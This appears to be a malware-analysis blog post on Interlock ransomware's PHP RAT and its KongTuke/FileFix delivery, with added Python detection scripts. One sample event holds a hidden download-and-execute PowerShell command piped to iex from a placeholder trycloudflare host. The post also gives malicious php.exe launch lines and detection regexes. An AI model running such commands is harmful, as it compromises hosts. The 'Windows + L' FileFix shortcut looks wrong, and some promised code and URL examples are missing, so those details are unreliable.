
Analyzing the new Interlock Malware PHP variant which uses updated KongTuke for delivery


Introduction

Interlock ransomware is a Malware-as-a-Service (MaaS) group that provides its affiliates with variants and evolutions of the Interlock malware. Having emerged in late 2024, it is a relatively new group on the ransomware scene. Its operations resemble LockBit's, but with nowhere near the advertisement and self-promotion: the group has chosen to lie low and pick a few high-severity targets.

The original loaders for this malware were fake update files for Google Chrome and Microsoft Edge. Once executed, the fake installer runs a PowerShell backdoor, which ultimately leads to delivery of the ransomware. What soon set Interlock apart was its quick adoption of ClickFix attacks to spread its malware instead of relying on fake update files.

ClickFix

ClickFix is a sophisticated form of social engineering attack that presents the user with a fake CAPTCHA or update prompt and instructs them to copy ‘text’ from the website and paste it into their own command prompt, PowerShell, terminal or Run window. This ‘text’ is usually a command that makes the machine download and execute the malware loader, or sometimes the malware itself. It is a new delivery method that relies on the user's confusion about the CAPTCHA process, or on their unfamiliarity with the commands normally required to download or update software.

KongTuke

KongTuke is malicious JavaScript code injected into a legitimate but compromised website; it redirects the user to a malicious site that masquerades as a ‘CAPTCHA’ verification prompt. Notably, the script does not always load the fake CAPTCHA: it first checks whether the user's environment is compatible with it. KongTuke was first observed in September 2024, and its use has since grown, especially as ClickFix and FileFix have become more common initial compromise vectors.

The file name of the injected script matches the following regex: \d[a-z]\d[a-z]\.js

The injected JS file takes the following steps in the background in order to compromise the user:

  1. Cookie checking: The script creates a cookie called “isCompleted” that stays valid for only 4 hours, possibly to avoid leaving traces. It also checks whether a cookie named “isCompleted” already exists; if not, it proceeds as normal.
  2. Data collection: The script gathers information about the machine and sends it to a C2 (Command and Control) server. This includes the OS, IP address, current URL (referrer), browser type, User-Agent string, and geolocation derived from the IP address.
  3. Next stage: On a successful response from the C2 server, the user is led to the fake CAPTCHA webpage. On an unsuccessful response from the C2 server, the page is reloaded.
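A defender-side check for the two page-level artifacts described above (the injected script's file-name pattern and the “isCompleted” cookie gate). This is an added example, not code from the post; the sample page and the indicator names are constructed.

```python
import re
from html.parser import HTMLParser

# File-name pattern of the injected KongTuke script, as given in the post.
KONGTUKE_NAME_RE = re.compile(r"\d[a-z]\d[a-z]\.js")

class _ScriptCollector(HTMLParser):
    """Collects external <script src> values and inline <script> bodies."""
    def __init__(self):
        super().__init__()
        self.sources, self.inline, self._in_script = [], [], False

    def handle_starttag(self, tag, attrs):
        if tag != "script":
            return
        src = dict(attrs).get("src")
        if src:
            self.sources.append(src)
        else:
            self._in_script = True

    def handle_data(self, data):
        if self._in_script:
            self.inline.append(data)

    def handle_endtag(self, tag):
        if tag == "script":
            self._in_script = False

def scan_page(html):
    """Return (indicator, detail) pairs found in a page's HTML source."""
    p = _ScriptCollector()
    p.feed(html)
    findings = []
    for src in p.sources:
        # Strip fragment and query string, then look only at the file name.
        name = src.split("#", 1)[0].split("?", 1)[0].rsplit("/", 1)[-1]
        if KONGTUKE_NAME_RE.fullmatch(name):
            findings.append(("kongtuke-script-name", src))
    for body in p.inline:
        # The loader gates itself on an "isCompleted" cookie.
        if "isCompleted" in body and "document.cookie" in body:
            findings.append(("iscompleted-cookie-check", "inline <script>"))
    return findings

# Constructed sample page (not a real compromised site).
SAMPLE_PAGE = """<html><head>
<script src="/wp-includes/js/jquery.min.js"></script>
<script src="https://static.example.test/3f7k.js?v=2"></script>
<script>if (!document.cookie.includes("isCompleted=")) { /* loader stub */ }</script>
</head><body>Welcome</body></html>"""

if __name__ == "__main__":
    for indicator, detail in scan_page(SAMPLE_PAGE):
        print(indicator, detail)
```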

New FileFix

KongTuke has recently moved from ClickFix to FileFix attacks, as security researchers have widely observed. While ClickFix prompts the user to paste the copied command into a Run box, FileFix places the command string on the user’s clipboard and opens a “File Upload” window through Windows Explorer. It then instructs the user to use the “Windows + L” shortcut to reach the address bar, paste the command already on their clipboard, and press ‘Enter’. The clipboard holds a command that launches either cmd.exe or powershell.exe with further instructions to execute. What makes this more effective than ClickFix is that no error messages or warnings are shown to the user. The command typically involves encoded PowerShell scripts that download and execute the malware.

In the case of the delivery of the new Interlock RAT, the following code was found:

As shown, the first command launches an instance of PowerShell with a few flags:

  • -ep Bypass: bypasses the execution policy, disabling PowerShell's script-signing restrictions, if any
  • -w H: opens a windowed instance of PowerShell but sets it to hidden, so the user never sees a PowerShell window open

After the “-c” flag, the actual command supplied to PowerShell begins inside the double quotes. First it deletes a scheduled task named “Updater”, using the /f flag to force the deletion; then it uses a WebClient with the User-Agent set to “PowerShell” to reach one of the domains hosting the malware and download the payload into memory as a string. Finally, piping into ‘iex’ executes the downloaded string in memory, giving file-less execution that makes this attack hard to detect.

Interlock Variant

The next command that we see here begins execution of the new Interlock variant:

"C:\Users\REDACTED\AppData\Roaming\php\php.exe" -d extension=zip -d extension_dir=ext C:\Users\\AppData\Roaming\php\wefs.cfg 1

This command invokes a locally stored copy of PHP embedded in the user’s roaming profile, an increasingly common practice among malware authors to evade detection. The “-d extension=zip” and “-d extension_dir=ext” parameters suggest the attackers rely on specific PHP extensions to unpack or process the “wefs.cfg” file. Notably, this file does not carry a conventional PHP file extension, likely a deliberate obfuscation choice to bypass static detection heuristics.
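Process-creation triage for both stages described above: the hidden, policy-bypassing PowerShell chain (task deletion, “PowerShell” User-Agent, download-to-iex) and the php.exe launch from the roaming profile with a non-.php script. This is an added example, not the post's code; the regexes, indicator names, sample events, REDACTED user name and PLACEHOLDER host are all constructed.

```python
import re
import shlex

# Command-line indicators drawn from the chain described in the post (constructed regexes).
INDICATORS = [
    ("ps-execution-policy-bypass", re.compile(r"(?i)(?:^|\s)-(?:ep|executionpolicy)\s+bypass\b")),
    ("ps-hidden-window", re.compile(r"(?i)(?:^|\s)-(?:w|windowstyle)\s+h(?:idden)?\b")),
    ("schtasks-delete-updater", re.compile(r"(?i)schtasks(?:\.exe)?\s+/delete\b.*\bupdater\b")),
    ("webclient-string-to-iex", re.compile(r"(?i)downloadstring\s*\(.*\|\s*(?:iex|invoke-expression)\b")),
    ("powershell-user-agent", re.compile(r"(?i)user-?agent['\"]?\s*[,=]\s*['\"]?powershell")),
    ("php-runtime-in-roaming", re.compile(r"(?i)\\appdata\\roaming\\.*\bphp\.exe")),
    ("php-zip-extension-flag", re.compile(r"(?i)-d\s+extension=zip\b")),
]

def php_script_arg(command_line):
    """Return the script path passed to php.exe, skipping -d key=value pairs and
    other dash options; None if no script argument is present."""
    tokens = [t.strip('"') for t in shlex.split(command_line, posix=False)]
    args = iter(tokens[1:])
    for tok in args:
        if tok == "-d":
            next(args, None)  # consume the key=value operand of -d
        elif not tok.startswith("-"):
            return tok
    return None

def score_event(image, command_line):
    """Return the indicator names that match one process-creation event."""
    hits = [name for name, rx in INDICATORS if rx.search(command_line)]
    if image.lower().endswith("php.exe"):
        script = php_script_arg(command_line)
        if script and not script.lower().endswith(".php"):
            hits.append("php-script-without-php-extension")
    return hits

# Constructed sample events (image path, command line). The user name is the post's
# REDACTED placeholder and the payload host is a placeholder, not a real indicator.
SAMPLE_EVENTS = [
    (r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "powershell -ep Bypass -w H -c \"schtasks /delete /tn Updater /f; "
     "$w = New-Object Net.WebClient; $w.Headers.Add('User-Agent','PowerShell'); "
     "$w.DownloadString('https://PLACEHOLDER.trycloudflare.com/a') | iex\""),
    (r"C:\Users\REDACTED\AppData\Roaming\php\php.exe",
     r'"C:\Users\REDACTED\AppData\Roaming\php\php.exe" -d extension=zip '
     r"-d extension_dir=ext C:\Users\REDACTED\AppData\Roaming\php\wefs.cfg 1"),
    (r"C:\php\php.exe", r"php.exe -d memory_limit=512M C:\inetpub\site\cron.php"),
]

if __name__ == "__main__":
    for image, cmd in SAMPLE_EVENTS:
        print(image, "->", score_event(image, cmd))
```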

The trailing 1 is likely a custom flag or argument used internally by the malware to differentiate versions or execution modes. Reverse engineering of the “wefs.cfg” content shows a highly obfuscated PHP loader that uses XOR-based string decryption routines and base64-encoded payloads, which are decoded and run in memory. This results in the launch of the new Interlock Remote Access Trojan (RAT), which exhibits capabilities such as:

  • Reverse shell over HTTP/S
  • Keylogging
  • Clipboard hijacking
  • Targeted data exfiltration from browser profiles (Chromium and Firefox derivatives)
  • Enumeration of mounted network drives

What stands out in this Interlock PHP variant is its persistence mechanism. Instead of traditional methods such as registry keys or scheduled tasks (the latter is deleted in the earlier PowerShell chain), the malware sets a recurring execution trigger via the Startup folder, disguising itself as a benign software component named “Adobe File Helper.” Additionally, mutex creation prevents re-infection of the same host, indicating a level of operational maturity and avoidance of unnecessary redundancy.

C2 Infrastructure and DNS Behavior

Tracking DNS queries made during the infection process led to the identification of a cluster of fast-flux domains under trycloudflare.com subdomains. These serve as temporary reverse proxies that mask the true C2 location and rotate IP addresses rapidly. Passive DNS shows TTLs as low as 60 seconds, with endpoints resolving to infrastructure hosted in Germany, Singapore, and the United States. The User-Agent string “PowerShell” in HTTP headers is a critical IOC, and so far the payload URLs have followed the format:

Examples:

This naming convention is likely autogenerated with a wordlist randomizer to avoid domain-pattern blacklisting.
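Network-side correlation of the two IOCs this section describes: DNS answers for trycloudflare.com subdomains with low TTLs, and HTTP requests carrying the “PowerShell” User-Agent, joined per source host. This is an added example, not code from the post; the pipe-delimited log format, tunnel names and addresses are constructed.

```python
import re
from collections import defaultdict

# Matches trycloudflare.com and any subdomain of it.
TRYCLOUDFLARE_RE = re.compile(r"(?i)(?:^|\.)trycloudflare\.com$")

def parse_line(line):
    """Parse one constructed log line into a dict, or None if malformed.
    Formats: dns|ts|src|qname|ttl  and  http|ts|src|host|user_agent"""
    parts = line.strip().split("|")
    if len(parts) != 5:
        return None
    kind, ts, src = parts[0], parts[1], parts[2]
    if kind == "dns":
        try:
            return {"kind": kind, "ts": ts, "src": src, "qname": parts[3], "ttl": int(parts[4])}
        except ValueError:
            return None
    if kind == "http":
        return {"kind": kind, "ts": ts, "src": src, "host": parts[3], "ua": parts[4]}
    return None

def triage(lines, low_ttl=60):
    """Tag each source host; 'high' when it both resolved a trycloudflare.com name
    and sent the 'PowerShell' User-Agent, otherwise 'medium'."""
    tags = defaultdict(set)
    for rec in filter(None, map(parse_line, lines)):
        if rec["kind"] == "dns" and TRYCLOUDFLARE_RE.search(rec["qname"]):
            tags[rec["src"]].add("trycloudflare-query")
            if rec["ttl"] <= low_ttl:
                tags[rec["src"]].add("low-ttl-answer")
        elif rec["kind"] == "http" and rec["ua"].strip().lower() == "powershell":
            tags[rec["src"]].add("powershell-user-agent")
    result = {}
    for src, t in tags.items():
        sev = "high" if {"trycloudflare-query", "powershell-user-agent"} <= t else "medium"
        result[src] = (sev, sorted(t))
    return result

# Constructed sample log lines; the tunnel names are placeholders, not real IOCs.
SAMPLE_LOGS = [
    "dns|1720000000|10.0.0.12|word1-word2-word3-word4.trycloudflare.com|60",
    "http|1720000001|10.0.0.12|word1-word2-word3-word4.trycloudflare.com|PowerShell",
    "dns|1720000002|10.0.0.15|www.example.test|3600",
    "http|1720000003|10.0.0.15|www.example.test|Mozilla/5.0",
    "dns|1720000004|10.0.0.20|dev-preview-tunnel-name.trycloudflare.com|300",
    "garbage line",
]

if __name__ == "__main__":
    for src, (sev, t) in sorted(triage(SAMPLE_LOGS).items()):
        print(src, sev, ", ".join(t))
```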

Conclusion

The new Interlock PHP variant shows significant evolution in both delivery and execution strategy. By leveraging techniques ranging from social engineering to file-less payload delivery, the actors behind Interlock demonstrate a growing sophistication that aligns them with some of the more prominent MaaS providers. The move to Cloudflare tunnels as temporary infrastructure, along with behavioral persistence and in-memory execution, makes this threat especially evasive and dangerous. Organizations must prioritize detection at the behavioral level and adopt a layered security approach to stand a chance against such adversaries.
